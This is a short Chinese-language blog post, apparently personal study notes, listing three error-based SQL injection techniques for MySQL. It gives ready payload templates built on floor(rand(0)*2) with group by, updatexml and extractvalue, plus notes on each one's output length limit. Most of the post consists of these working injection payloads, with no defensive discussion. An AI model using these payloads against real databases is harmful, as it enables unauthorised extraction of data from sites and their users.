sql注入方式(报错注入)
(1). 通过floor报错
and (select 1 from (select count(*),concat((payload) from users limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)
其中payload为你要插入的SQL语句需要注意的是该语句将 输出字符长度限制为64个字符
(2). 通过updatexml报错
and updatexml(1,payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效
(3). 通过ExtractValue报错
and extractvalue(1, payload)
输出字符有长度限制,最长32位。
- 标题: sql注入方式(报错注入)
- 作者: 晨曦
- 创建于 : 2024-11-07 16:40:52
- 更新于 : 2025-01-14 03:24:47
- 链接: https://blog.starlit.icu/2024/11/07/web/sql注入/报错注入/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论